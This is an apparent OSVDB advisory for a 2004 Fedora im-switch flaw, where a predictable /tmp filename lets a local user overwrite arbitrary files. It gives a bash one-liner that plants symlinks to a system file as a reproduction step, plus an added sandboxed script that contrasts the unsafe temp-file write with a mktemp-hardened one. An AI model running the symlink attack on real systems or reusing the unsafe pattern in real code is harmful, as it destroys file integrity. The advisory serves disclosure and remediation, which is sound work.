Fedora im-switch Arbitrary File Overwrite

2004-06-29T07:26:54
ID OSVDB:7772
Type osvdb
Reporter SEKINE Tatsuo
Modified 2004-06-29T07:26:54

Description

Vulnerability Description

Fedora contains a flaw that may allow a malicious user to gain unauthorized privileges. The issue is triggered when the im-switch command uses a predictable filename in the /tmp directory, which may allow an attacker to overwrite arbitrary files. This flaw may lead to a loss of integrity.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Red Hat has released a patch to address this vulnerability.

Manual Testing Notes

Steps to Reproduce:

1. An attacker who has only normal privileges types the following:

$ bash -c 'i=1;while [ $i -lt 65536 ]; do ln -s /etc/IMPORTANT_FILE /tmp/imswitcher$i; let "i++"; done'

2. root types the following to set the system-wide IM setting:

# /usr/bin/im-switch -w -m xim

Actual Results: /etc/IMPORTANT_FILE becomes broken.
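
The unsafe temporary-file pattern beside a hardened one, as an added example that is not taken from the advisory or from the im-switch package. It assumes the temporary name has the form imswitcher<PID>, which the reproduction above implies but the page does not state; the function names are hypothetical, and everything runs inside a constructed throwaway directory.

```shell
#!/bin/sh
# Added example: constructed sandbox, nothing outside it is touched.

# Unsafe pattern (assumed shape of the flaw): a name built from the PID,
# opened with a plain redirect, which follows any symlink already there.
write_unsafe() {  # $1 = temp dir, $2 = data
    tmp="$1/imswitcher$$"
    printf '%s\n' "$2" > "$tmp"
    printf '%s\n' "$tmp"
}

# Hardened pattern: mktemp picks an unpredictable name and creates the file
# exclusively (O_EXCL, mode 0600), so a pre-planted link is never opened.
write_safe() {  # $1 = temp dir, $2 = data
    tmp=$(mktemp "$1/imswitcher.XXXXXXXXXX") || return 1
    printf '%s\n' "$2" > "$tmp"
    printf '%s\n' "$tmp"
}

# Run one writer in a sandbox where the predictable name is already a
# symlink to a stand-in "important" file; succeed if that file survived.
check_writer() {  # $1 = write_unsafe | write_safe
    box=$(mktemp -d) || return 2
    printf 'original\n' > "$box/important"
    mkdir "$box/tmp"
    ln -s "$box/important" "$box/tmp/imswitcher$$"
    "$1" "$box/tmp" "xim" > /dev/null
    result=$(cat "$box/important")
    rm -rf "$box"
    [ "$result" = "original" ]
}

check_writer write_unsafe && echo "unsafe: intact" || echo "unsafe: target overwritten"
check_writer write_safe   && echo "safe: intact"   || echo "safe: target overwritten"
```

The sandbox directory is neither sticky nor world-writable, so the Linux fs.protected_symlinks restriction does not mask the unsafe behaviour here.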

References:

Secunia Advisory ID: 12037
Packet Storm: http://packetstormsecurity.org/0407-advisories/fedora_im-switch_tempfile_race.txt
Other Advisory URL: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=126940
ISS X-Force ID: 16682
Bugtraq ID: 10717